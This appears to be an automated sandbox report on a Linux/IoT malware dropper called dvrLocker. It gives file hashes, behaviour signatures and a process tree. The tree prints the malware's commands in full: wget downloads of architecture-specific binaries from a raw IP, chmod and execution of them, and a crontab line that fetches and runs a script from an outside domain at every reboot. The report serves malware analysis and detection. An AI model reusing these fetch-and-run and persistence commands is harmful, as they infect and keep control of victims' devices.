Analysis
-
max time kernel
150s -
max time network
138s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsel-20240226-en
General
-
Target
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
-
Size
913B
-
MD5
c18ef2271ad912c7542293151373ffa0
-
SHA1
65fb65c17671657fc431173051fe794c6c63007d
-
SHA256
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
-
SHA512
fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 811 sh 820 chmod 824 chmod 828 chmod 832 chmod 792 chmod 804 chmod 809 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/lib/dvrLocker 793 dvrLocker /tmp/lib/dvrLocker 805 dvrLocker /tmp/lib/dvrLocker 810 dvrLocker /tmp/lib/dvrLocker 821 dvrLocker /tmp/lib/dvrLocker 825 dvrLocker /tmp/lib/dvrLocker 829 dvrLocker /tmp/lib/dvrLocker 833 dvrLocker -
Renames itself 1 IoCs
pid Process 810 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 168.235.111.72 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.7ecNDm crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself [watchdog/0] 810 dvrLocker -
description ioc Process File opened for reading /proc/868/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/832/status dvrLocker File opened for reading /proc/844/status dvrLocker File opened for reading /proc/860/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/853/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/823/status dvrLocker File opened for reading /proc/846/status dvrLocker File opened for reading /proc/850/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/819/status dvrLocker File opened for reading /proc/820/status dvrLocker File opened for reading /proc/835/status dvrLocker File opened for reading /proc/867/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/848/status dvrLocker File opened for reading /proc/855/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/856/status dvrLocker File opened for reading /proc/866/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/830/status dvrLocker File opened for reading /proc/837/status dvrLocker File opened for reading /proc/839/status dvrLocker File opened for reading /proc/852/status dvrLocker File opened for reading /proc/862/status dvrLocker File opened for reading /proc/875/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/mounts dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/864/status dvrLocker File opened for reading /proc/876/status dvrLocker File opened for reading /proc/826/status dvrLocker File opened for reading /proc/829/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/840/status dvrLocker File opened for reading /proc/788/cmdline dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/854/status dvrLocker File opened for reading /proc/871/status dvrLocker File opened for reading /proc/872/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 807 rm 798 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/lib/dvrLocker 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Processes
-
/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown1⤵
- Writes file to tmp directory
PID:655 -
/bin/lsls -l /proc/1/exe2⤵PID:656
-
-
/bin/lsls -l /proc/10/exe2⤵PID:663
-
-
/bin/lsls -l /proc/103/exe2⤵
- Reads runtime system information
PID:668
-
-
/bin/lsls -l /proc/11/exe2⤵PID:671
-
-
/bin/lsls -l /proc/111/exe2⤵
- Reads runtime system information
PID:674
-
-
/bin/lsls -l /proc/113/exe2⤵PID:678
-
-
/bin/lsls -l /proc/114/exe2⤵PID:681
-
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:684
-
-
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:685
-
-
/bin/lsls -l /proc/14/exe2⤵PID:688
-
-
/bin/lsls -l /proc/140/exe2⤵PID:689
-
-
/bin/lsls -l /proc/144/exe2⤵
- Reads runtime system information
PID:691
-
-
/bin/lsls -l /proc/146/exe2⤵
- Reads runtime system information
PID:694
-
-
/bin/lsls -l /proc/15/exe2⤵PID:695
-
-
/bin/lsls -l /proc/153/exe2⤵PID:697
-
-
/bin/lsls -l /proc/16/exe2⤵PID:698
-
-
/bin/lsls -l /proc/168/exe2⤵PID:699
-
-
/bin/lsls -l /proc/169/exe2⤵
- Reads runtime system information
PID:701
-
-
/bin/lsls -l /proc/17/exe2⤵PID:702
-
-
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:703
-
-
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:704
-
-
/bin/lsls -l /proc/2/exe2⤵PID:705
-
-
/bin/lsls -l /proc/20/exe2⤵PID:706
-
-
/bin/lsls -l /proc/21/exe2⤵PID:707
-
-
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:708
-
-
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:709
-
-
/bin/lsls -l /proc/235/exe2⤵PID:710
-
-
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:711
-
-
/bin/lsls -l /proc/25/exe2⤵
- Reads runtime system information
PID:712
-
-
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:713
-
-
/bin/lsls -l /proc/27/exe2⤵PID:714
-
-
/bin/lsls -l /proc/28/exe2⤵
- Reads runtime system information
PID:715
-
-
/bin/lsls -l /proc/29/exe2⤵PID:716
-
-
/bin/lsls -l /proc/291/exe2⤵PID:717
-
-
/bin/lsls -l /proc/292/exe2⤵PID:718
-
-
/bin/lsls -l /proc/293/exe2⤵
- Reads runtime system information
PID:721
-
-
/bin/lsls -l /proc/295/exe2⤵
- Reads runtime system information
PID:722
-
-
/bin/lsls -l /proc/298/exe2⤵PID:724
-
-
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:726
-
-
/bin/lsls -l /proc/322/exe2⤵PID:728
-
-
/bin/lsls -l /proc/324/exe2⤵PID:730
-
-
/bin/lsls -l /proc/327/exe2⤵PID:731
-
-
/bin/lsls -l /proc/344/exe2⤵PID:733
-
-
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:735
-
-
/bin/lsls -l /proc/41/exe2⤵PID:736
-
-
/bin/lsls -l /proc/42/exe2⤵PID:739
-
-
/bin/lsls -l /proc/43/exe2⤵
- Reads runtime system information
PID:740
-
-
/bin/lsls -l /proc/5/exe2⤵PID:741
-
-
/bin/lsls -l /proc/589/exe2⤵
- Reads runtime system information
PID:743
-
-
/bin/lsls -l /proc/6/exe2⤵PID:745
-
-
/bin/lsls -l /proc/605/exe2⤵
- Reads runtime system information
PID:747
-
-
/bin/lsls -l /proc/607/exe2⤵
- Reads runtime system information
PID:749
-
-
/bin/lsls -l /proc/609/exe2⤵
- Reads runtime system information
PID:750
-
-
/bin/lsls -l /proc/610/exe2⤵
- Reads runtime system information
PID:753
-
-
/bin/lsls -l /proc/641/exe2⤵PID:754
-
-
/bin/lsls -l /proc/647/exe2⤵PID:756
-
-
/bin/lsls -l /proc/648/exe2⤵
- Reads runtime system information
PID:758
-
-
/bin/lsls -l /proc/650/exe2⤵PID:760
-
-
/bin/lsls -l /proc/652/exe2⤵
- Reads runtime system information
PID:761
-
-
/bin/lsls -l /proc/653/exe2⤵
- Reads runtime system information
PID:763
-
-
/bin/lsls -l /proc/654/exe2⤵PID:764
-
-
/bin/lsls -l /proc/655/exe2⤵
- Reads runtime system information
PID:767
-
-
/bin/lsls -l /proc/7/exe2⤵PID:768
-
-
/bin/lsls -l /proc/8/exe2⤵PID:770
-
-
/bin/lsls -l /proc/81/exe2⤵PID:772
-
-
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:774
-
-
/bin/rmrm -rf /tmp/lib/2⤵PID:776
-
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:777
-
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:779
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:781
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm -rf mpsl2⤵PID:796
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:807
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:808
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:810 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:811 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:813
-
-
/usr/bin/crontabcrontab -l4⤵PID:814
-
-
-
-
/bin/rmrm -rf arm2⤵PID:818
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:819
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:823
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:827
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm -rf arm72⤵PID:830
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:831
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:835
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
306B
MD57d430e045766ddb81fa3cdc9a1615d90
SHA179dfcc0c73acbf0b65f441d0a1eb56099079fbd3
SHA25692d638a1e2a2c268a45a7c205c60a607ef650bf9982c589931ffd9303cb121ab
SHA5121c2b5933370207dd545b856cf516a7cdc4d3e7e95ccc06a4e398af3be4e3674f6afec9e391e89c2486eaba0d00d7057fcf40e4369dd9a9b3e2077210ce2ec631